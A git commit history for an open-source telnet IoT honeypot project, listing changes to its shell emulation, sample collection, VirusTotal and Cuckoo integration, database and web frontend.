Date:   Sun Dec 17 05:58:44 2017 +0100

    Fix wrong requirement name

commit f39c64bbc2f5be71c4cb73a200e8bbbaceefecfc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:50:39 2017 +0100

    Add chart.js animation on mobile devices

commit db528af929366d2684818e16fe171c60da6318fc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:38:38 2017 +0100

    Remove use_local_db option, it breaks to much internal structure

commit f5ffee9907c5c2c9df85d51ba3c59540dd5d2b26
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 05:25:11 2017 +0100

    Add basic admin menu

commit 68147ff7e5f7b811006944bf4cd7f44ab851faf3
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 04:34:38 2017 +0100

    Add users table, full multi-user support

commit 57186b0a62538634c42ab3c77ad766b60d3b4d21
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 02:57:02 2017 +0100

    Change configuration file format

commit c635a3054a3db4acc91549cd394c813c9a11abcc
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 17 02:09:06 2017 +0100

    Add basic single-user backend authentification

commit 2a7c5e77c9113eccb790a8ced38d6f0c5ebdb7f0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 14:21:14 2017 +0100

    Fix && operator

commit d0d8f6541701675715bf786f86dbea1d5869df08
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:46:45 2017 +0100

    Delete unused method

commit 53ed295dbdd69240f3fce18987d17a0ecdc4cac2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:46:14 2017 +0100

    Fast connection fetch for graph

commit 28b54596f6e4346b69a8b885dcb764b334a15b89
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:43:37 2017 +0100

    forgot

commit 8ef90cd376b33f4913f14488b0283bd3106c1c11
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 08:42:31 2017 +0100

    Forntend update

commit ae3fd9b85b6b0f64e52f7d627819e0a5d89327a6
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 07:54:53 2017 +0100

    Save associates in db for better analyssi

commit 208467450c97c142cca7ce5aab14ecbbf748c48f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 06:44:38 2017 +0100

    Allow trailing ;

commit 01fb8cd9393f63c9ff966a59ec6b448258078454
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 05:27:56 2017 +0100

    Minimum filesize 128 bytes

commit 136fc5b6ef5c92e9bd3e5770dcb00443b29dbe28
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 05:23:43 2017 +0100

    Rework session - backend comm

commit 3624c662d1455df766d4f9e1e360ba7e4618f40c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:33:34 2017 +0100

    Improve dd, add /proc/cpuinfo

commit 757a5c200fb915706415c0379d4e0464df6c2d30
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:24:41 2017 +0100

    Add cp

commit 8baaa9f3252a87907a9a33ec5e2f0835dc795a27
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 03:15:44 2017 +0100

    Some adjustments

commit 08c747a5f2e745c7d117767fdfdb9c89498fb667
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:41:04 2017 +0100

    Fix conditional execution

commit 1aeba4d93217cf574188d847620eff0f3a4905b0
Merge: b84c7a3 4e040a2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:17:38 2017 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit b84c7a38155f7f18f41b628d72158b73f76a2e16
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 12 02:17:23 2017 +0100

    Introduce context-free semi-shell grammar w/execution env

commit 4e040a25ed11947da58e735e02a16cfccfb1eb74
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 11 04:02:46 2017 +0100

    Threat concurrent connections from same ip as associates

commit 7966bd26363174fee22db3ed06538048707d838a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 08:00:13 2017 +0100

    Token is now fallback output only

commit 458a7be947d697bcef24c2f92594d62e797ef42f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:54:11 2017 +0100

    Fix wrong wget output

commit b365418b21794e01ec01de2816bb260bd2c71fa9
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:46:59 2017 +0100

    Fix shell banner popping up everytime

commit a2abce530677903c54925fb8e09ffa4aa2ca0f88
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:43:21 2017 +0100

    Split commands by ;

commit 7a2d47b4131247fb25b9e08f09bf9338cdb0a5c1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:34:47 2017 +0100

    Command fixes

commit c7fcaf060c2cd8481481c32866468baf43342369
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:27:31 2017 +0100

    Fix broken token regex

commit 2eb91be65610e2cf227270b3c1ae452a60d56788
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:24:32 2017 +0100

    fix

commit c92213cdd0f9408916fefe089268bc846e057e52
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 07:22:34 2017 +0100

    Support echo -ne, change port to 2223

commit 5a7f8d129e222db970914cebf47f4ff9685da4d0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 01:28:20 2017 +0100

    Improve graph

commit 93c9ec04e7bf2e357da093fa98199185a89f663e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 10 01:05:17 2017 +0100

    Reduce db lookup depth, add urls and samples to experimantal graph

commit 6e55162811b66c2cccd80b4ead60eebb6324b4c1
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 23:59:24 2017 +0100

    Add exerimental neighbor graph drawing site

commit 195e4e5693b4eda45b7c04f6deeb0752030bd3da
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:43:03 2017 +0100

    Add tooltip

commit 0d2bbf495f18e9d2a19e571125b8278eb2b59ae0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:26:50 2017 +0100

    cleanup

commit 3886dae1eeb53439e265b6f7739de6359b7d7658
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:25:41 2017 +0100

    Set default db to sqlite to help with initial setup

commit 29e19e900ecaead38059878b2058123190a2afe3
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:10:36 2017 +0100

    Added new dependency simpleeval

commit e593d45e05081065c2f62268748b93f2f9146de4
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:02:04 2017 +0100

    Some sample tags

commit a231cefb1a98fba683a4482825f801837e324271
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 9 05:01:26 2017 +0100

    Add support for Tags

commit 1a7243243cef46c339b89374ae5676ed58e5c2ee
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 17:05:33 2017 +0100

    Re-started http://phype.pythonanywhere.com/

commit de04c6d6d2974d995f99dc0c46489f9a473fa843
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:56:12 2017 +0100

    Update INSTALL.md

commit ae7e386221c77178758ab2488e9c5a9e5b6509fe
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:50:11 2017 +0100

    Update INSTALL.md

commit 451fbc96b59644c3080274eddc90b531cbcfbe15
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:45:22 2017 +0100

    Update INSTALL.md

commit c28e6617492b8c4f69d7c4c517e65585134c067b
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:38:53 2017 +0100

    Update INSTALL.md

commit 87353cc5525b0d789f89c270d1be10c39d91aa9b
Merge: ff79000 3d36fdf
Author: Phype <phypemobile@gmail.com>
Date:   Wed Nov 29 16:18:01 2017 +0100

    Merge pull request #8 from doomedraven/master
    
    update cuckoo module to reflect api changes

commit 3d36fdf2aa12f1324bacc67013db5362c686f10e
Author: doomedraven <doommedraven@gmail.com>
Date:   Mon Nov 13 19:43:29 2017 +0100

    better check

commit a7312369fd84c11e51f1e05fb3252c02c7e8cd45
Author: doomedraven <doommedraven@gmail.com>
Date:   Mon Nov 13 19:39:02 2017 +0100

    update cuckoo module to reflect api changes
    
    and disable warnings

commit ff7900074cd982003af50f7eda0883c7e05798f1
Author: Phype <phypemobile@gmail.com>
Date:   Mon Nov 13 18:37:54 2017 +0100

    Correct horribly awful spelling mistake

commit 07a7e2519b45e109d75f3811480d00c6a57bafdf
Merge: 15343df 1c0338b
Author: Phype <phypemobile@gmail.com>
Date:   Mon Nov 13 18:18:45 2017 +0100

    Merge pull request #4 from doomedraven/master
    
    fixed/improvements

commit 1c0338b9e5f30dba80137e46e87282a0a0f6052f
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 14:28:03 2017 +0100

    fix

commit ceb2c94829ca7179a24c5b8e725e824b252c4e2f
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 14:25:55 2017 +0100

    upload to vt

commit 166939dcce5589eebc5368f98cab625914072a7a
Author: doomedraven <doommedraven@gmail.com>
Date:   Sat Nov 4 11:32:31 2017 +0100

    remove object from cuckoo class

commit 85944458ec9f745a16efc620242153909c6bd214
Author: doomedraven <doommedraven@gmail.com>
Date:   Fri Nov 3 20:10:35 2017 +0100

    fixed/improvements
    
    1 - create folder automatically if not exists
    2 - cuckoo integration(example linux.huntingmalware.com)
    3 - debug False by default
    4 - instalation documented
    5 - added urls/samples tab/template

commit 15343df9d51511e27abeaef6a0d7ae3a0a20c8af
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed May 24 01:45:52 2017 +0200

    Standard apiurl.js, TODO, README

commit 4dd567e52ff15006a6c4b58390875115a92433ce
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed May 24 01:35:29 2017 +0200

    New Screenshots

commit b76b5a0f75a6f7e88d27b9b34be06c0f993a6612
Merge: 3ac7aa4 a9e0c59
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon May 22 05:05:23 2017 +0200

    Merge branch 'master' into client-server

commit 3ac7aa4f9bb31bbca3b81acf48154d09524fb4ed
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 03:25:15 2017 +0200

    Frontend goodies

commit 439ec1b539c288f55532a2b504dfd7d1ef34c3ed
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:59:17 2017 +0200

    typo latnic -> lacnic

commit 97b72c873167ef12426e6995f4d994616fd5a45c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:57:10 2017 +0200

    Add EU to country list (example.com)

commit 7cafb8d9c9aca9951e889553c984cfcd65ddfa5d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:51:16 2017 +0200

    Automatically get ASN Info

commit 91022f50fe4d073c4669070bfb427a896ec7098f
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 20 01:26:59 2017 +0200

    Add ASN Info to db, ASN Info page

commit b19f1eb9ecff409b59934945e7b13f5fa2064360
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Apr 19 23:54:09 2017 +0200

    forgot to change pass to password in overview

commit cd7f7abbfcb75be4c22dc45290be3940e5ec7446
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Apr 19 23:52:36 2017 +0200

    More detailed filtering mechanism

commit f4fa311dc59ba6127394424b5c547e1af9698ca4
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Apr 18 19:46:21 2017 +0200

    Add connectiong association, add conection list with filtering for ip,country

commit da18d6c44f96e861ddb58e8e9de835b178e2328a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:54:29 2017 +0200

    cat busybox, frontend improvements

commit ad8e35dfae29ae7eb6f28890346dfd9105fa72e6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:29:22 2017 +0200

    Basic VT integration

commit 2d8294908427b93b8fd6f514db3e115fba94107f
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:02:13 2017 +0200

    Activate new index file

commit dd5adbccb10c771dae52e41048d97dc5b589b7b5
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 20:00:28 2017 +0200

    Add URL IP,ASN etc to Frontend

commit 1dab84cefaf4e6d145e20783bf321fba157531a9
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 19:47:17 2017 +0200

    Add DB conversion for commit 9a28ce90

commit 9a28ce90476c5ed175ef5cf6250d933ea2a5bc6d
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 19:39:26 2017 +0200

    fdssdf

commit e380901c2278ffdc800db35928c218edb8f0e49f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 18:33:44 2017 +0200

    Add country flags

commit 79fdea97aab98c778915ef1e86fbb92eb2ae57a2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 18:07:42 2017 +0200

    Add Country Names

commit 3806298ec8370b7ff9071d5019261b7fb18344fd
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 16:50:25 2017 +0200

    forgot :

commit 409992fd586010353193c4a9cf7751aebdaa7131
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 16:49:18 2017 +0200

    Drop check_same_thread arg for non-sqlite conns

commit 984a237929b2ef32fd0966a7e4b4b756af7ffa46
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 15:49:14 2017 +0200

    Remove swap file

commit 29142c6ef403374f02ad8cf26b6edb70c9a10c77
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 15:48:19 2017 +0200

    Stats

commit a90ed40b1b48f1b519aeced90731556a410bc1a2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:37:54 2017 +0200

    Show AS Info

commit 1322efd95dbaa296e60629dd26914558b59b8516
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:35:48 2017 +0200

    Ignore Bad Ascii Chars in Session text to prevetn failing uploads

commit 84cb41141086482fc20068b9431ca3f91723d010
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Apr 17 13:09:53 2017 +0200

    IP Info, Frontend

commit 2fd2e39118d20e03f0710f6a097f54e99145dc6b
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 15:59:36 2017 +0200

    Overview view etc.

commit 340bcf39f9918cbc91c785a38a766a4354285131
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 06:27:43 2017 +0200

    Basci new frontend ready

commit e331c7e15d9d3d3a5d0fdc488d37139bdcd9f310
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 06:14:16 2017 +0200

    New frontend

commit eb90810f75801db22eea129c6436ee3863b09b79
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Apr 16 06:14:03 2017 +0200

    New backend

commit bf0cfbf1b21cb508a92c333dcb32bfedd78ab179
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:28:59 2017 +0200

    Forgot ot remove config.py from ignores

commit e4a25be432080410bec73afc78d59c52d118c8c6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:25:00 2017 +0200

    Add option to NOT save samples gathared

commit 77c4400c268d383ccfd196e5d0c077c5cd017f4d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:13:47 2017 +0200

    Do not save file at client, drop tftp because it does not work anyway

commit 86969a30d5fa2e95f031606e3c26fd851b636dde
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Apr 15 04:02:29 2017 +0200

    Rework client/server arch

commit 4cc89af93778ebc0762ede3536c19bf4fd22ebf2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 13 05:21:48 2017 +0200

    Add some doku, sample config.py for local mode

commit 793f93173d1fd248abf2391f8386cf471eda3976
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Apr 13 05:09:30 2017 +0200

    Refactor Client/server Arch - local running

commit a9e0c595086a8b33ddea243ec0080c5ff3dc4e39
Author: Phype <phypemobile@gmail.com>
Date:   Thu Apr 13 01:54:12 2017 +0200

    Fill template

commit 63759b2763920b450bbc86c02b141279b78fe4d2
Author: Phype <phypemobile@gmail.com>
Date:   Thu Apr 13 01:51:00 2017 +0200

    Create LICENSE

commit 5bb4935da71e6ba404ff3abefa310ef540da04d7
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:26:08 2017 +0100

    Update cl/srv install

commit 8dc039aaf949fc7d1095d8fa61518c2437dfde6c
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:23:18 2017 +0100

    Add tftpy as dependency

commit 1d93648cbace7ad887a270cfffc3a50e0b4ad835
Author: Phype <phypemobile@gmail.com>
Date:   Sat Mar 25 22:22:05 2017 +0100

    Ref to client-server branch

commit f40c152c43a6efe21d82ff967894c7318f781f36
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Mar 25 22:05:07 2017 +0100

    Reset Master to commit 5caca711a12efb1b9c05ef1ff8eec68489a1e990

commit 2b0ad470a36d0ead213fbb86b2803ee2994680be
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Jan 11 12:17:46 2017 +0100

    Fix broken graph display

commit 0317d44ad56aed6af0c0656c1ac49ee9d8ab6ba7
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:47:41 2017 +0100

    Better clamp sample list

commit b7ffaaa03b9aa9218f3cc2572673f3f3dbc9340e
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:41:18 2017 +0100

    Basic stats on frontend

commit 50cf3d5051cde677ebbbb1b04541f4c2d1f46cce
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:37:29 2017 +0100

    Re-introduce basic stats

commit e5641fa7e42a0c9dbf39afb33a298566b7370dc0
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:32:14 2017 +0100

    Re-add back to index link

commit cd077fdf38becb6264256f2378c92a23be8d9533
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:30:54 2017 +0100

    Just show first sample on detail page

commit 2d267b9f9fbf2998d4456d9d9da83999a3700c3a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:28:46 2017 +0100

    revert

commit 1257da4d53a38fb0384673b9bb80210fb1652496
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:26:00 2017 +0100

    select other col

commit 77de49622ff7885517e918646608e943ef0c23f5
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Jan 10 09:21:48 2017 +0100

    Sample stats limited to latest active samples

commit 44ea91b6018692905400ff4274437168277dc9bc
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:55:03 2017 +0100

    api url 2

commit 8c11975704c69ce6c0a444191273e8dbee9d56c2
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:45:06 2017 +0100

    api url

commit 855ec081b58d38d217dda93a838426888cb573b8
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:42:32 2017 +0100

    Fix detail page

commit 2e904950006a960ea75ec2961ce03443327d1a8c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 15:04:11 2017 +0100

    Remove last bit from history which is always 0

commit 9a68a38dbc825052b8a00784c094d52728548369
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 14:45:38 2017 +0100

    Backend sample upload

commit 3092fae4783f67b2e86c2a377f70857e83d9dbc3
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:46:17 2017 +0100

    new url

commit 76b43ff98cef446b40b4248deb62debc5b981c8e
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:36:07 2017 +0100

    epic fail, bad column size

commit 4e140f4d255bd1d6398a8bb84cb972a7a38f86cf
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 11:08:44 2017 +0100

    Fix date, hopefully

commit 731829c95eefbb0acb2e61db1134e38d1b67a4a0
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 10:59:25 2017 +0100

    Make frontend work with new backend api

commit 3e2c1c821dc2ac63b299573be400b767aed3f6ff
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 10:19:29 2017 +0100

    re-implemented old backend

commit dbcc508c29ea1528bdd9b732d167098a29d4422c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 8 04:20:26 2017 +0100

    Retry every time when uploading to backend

commit 55c14d0edd75f1d9babc507239e8fdf39ee0cc40
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 05:49:53 2017 +0100

    meeeeh

commit 8f4c065a2f508ecbd566ef577e3ccee9c566e95b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 03:22:13 2017 +0100

    More db crap

commit ed8e8dd9f02a51e3cded6d3b3bfb3bbaac581f3c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 03:08:30 2017 +0100

    sqlite

commit 2e2813787f39bb12f0bf4fa7d1aacad4c3186c4c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 02:40:09 2017 +0100

    Forgot one ...

commit 336ba0ac58fa5812c7b34277d4986b7aec1a409f
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 02:38:18 2017 +0100

    Get rid of "Mysql server has gone away"

commit 559309b1adeffbd68ec9f69bfba22167cb29678d
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Jan 7 01:25:04 2017 +0100

    Client/Server test, now using flask, not djanog

commit f1a6480656a9d822c2cfc17cf101d8b726f914e2
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 18:28:13 2017 +0100

    Django backend test

commit 5caca711a12efb1b9c05ef1ff8eec68489a1e990
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:54:18 2017 +0100

    remove dn

commit d564e0f74814c5720313e7eda78d37400baf8e9a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:49:34 2017 +0100

    Demo url

commit d02bc9744ae4261dc7bc671995fd90ab4c529539
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:46:53 2017 +0100

    Fix Date display

commit 59e7da2fc05f0e42f368012a08e3a60057f9595a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 05:24:38 2017 +0100

    ported php to mysql

commit 25ea2d70ab806b0765f07d20331f08eb1ba1ace6
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:57:34 2017 +0100

    todo

commit 1456a55dc28c002f099ac7cfc98ded2466371eab
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:50:21 2017 +0100

    Parsing support for nc and ftpget. No dowload support yet.

commit 3af2896db6f5861f212aef541e7449468d358e58
Merge: 215a127 7509b13
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:48:39 2017 +0100

    Merge branch 'master' of github.com:Phype/telnet-iot-honeypot

commit 215a12779f36217392529e0e8cf0f1a01623071c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 03:48:33 2017 +0100

    cleanup

commit 7509b13e35f398ccb5e0fdfb9b3b7f5a22407bce
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Jan 6 01:54:31 2017 +0000

    fix absolute url

commit bbec1325c4ed77b0e157f910b47a8ebc4d1bcddf
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:37:16 2017 +0100

    Exception name

commit 80f96d349cb0ca94cd4143b3d4a064e908e970f9
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:35:38 2017 +0100

    Make conns_urls unique

commit d85fd205c67b7c0792dc40a9e785baabcadb6c92
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Jan 1 20:23:15 2017 +0100

    Make delta in detail page configurable

commit 9ce343d529eacdd4051eb2f5d41d316e818c3f2d
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:51:41 2016 +0100

    Introducing max session time, download exception handled better

commit 4a81c6b6a631d7c29e686c472ce3e7c004a0fe66
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:30:10 2016 +0100

    Fix exception logging when client disconnects

commit 30a0dbb89d36177bd2f8947b369f4b496773d36c
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Sat Dec 31 00:20:29 2016 +0100

    Auto upload to vt.com

commit 82f41e438167e32a700b8c08970dce1ede41e471
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Dec 30 23:39:00 2016 +0100

    More cleanup

commit fb448984ce459d81f3064a672254cfdbd07775ee
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Fri Dec 30 22:35:14 2016 +0000

    Some cleanup in frontend

commit 7e404c92243477d2520b2c9110b9fee3c880ed58
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:21:20 2016 +0000

    vt update script

commit 87f1280fe2cd0e83d7acaf46d843ff746684949a
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:06:49 2016 +0100

    Tests

commit dc9ab407d2a70da61aa01592badba7596b0e9665
Author: Phlipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 29 00:06:31 2016 +0100

    TFTP Support

commit 7a1d5bf1076742726bf6f4360af2aafc399b0d8a
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 28 01:25:35 2016 +0000

    Only show 24h in pie

commit 2a7a1164866a5e0089702b51e3dcc5db3bf25f20
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:45:11 2016 +0100

    fix absolute url

commit cea657cc1ff446d854d4ede742f2deaeb799a7ed
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:42:50 2016 +0100

    doku2

commit c15bac4b1e5dde3b6153fb1bc2051bb69c152fbf
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:40:25 2016 +0100

    Doku

commit 99c85d1dddc6e2ecf0db1dca241e0811b1a90a7e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 27 22:13:07 2016 +0100

    todo

commit bd5f83d80bfa68c7afd952a4d157fa6b5106921b
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:44:03 2016 +0100

    Syntax fail

commit c99cc7e819b018e6429118d23b25abf4673a2263
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:41:42 2016 +0100

    Fix db insert

commit 40ab49c4aa7486a29d4daef42df793520aa86237
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:37:23 2016 +0100

    Fix length -> len

commit 19622191a3a459bbcfa22704f5883aa00d713b10
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Mon Dec 26 06:14:48 2016 +0100

    Fix Month display

commit e1d2e5c78c2300a71f65f14f7cb3eb7700946e05
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:11:07 2016 +0100

    Delete js dependencies etc.

commit 446df1b0cccb517bee719253d80b1f9610159d73
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:07:54 2016 +0100

    Add sample session

commit 9087062583999ec76f7d45c9ff98c1c93bd78447
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 04:05:17 2016 +0100

    Add description

commit 3004cd836454ae1dd18a4a522f50f92147564d90
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Tue Dec 13 03:52:16 2016 +0100

    Added detailed stats

commit d5b9b031b5dcc1c3979b294a589970eedfd8e877
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Sun Dec 11 01:56:06 2016 +0100

    Virustotal results into db

commit 91de773396929127031d4ab45cd8090bf47401c0
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 17:19:29 2016 +0100

    Save and display file length

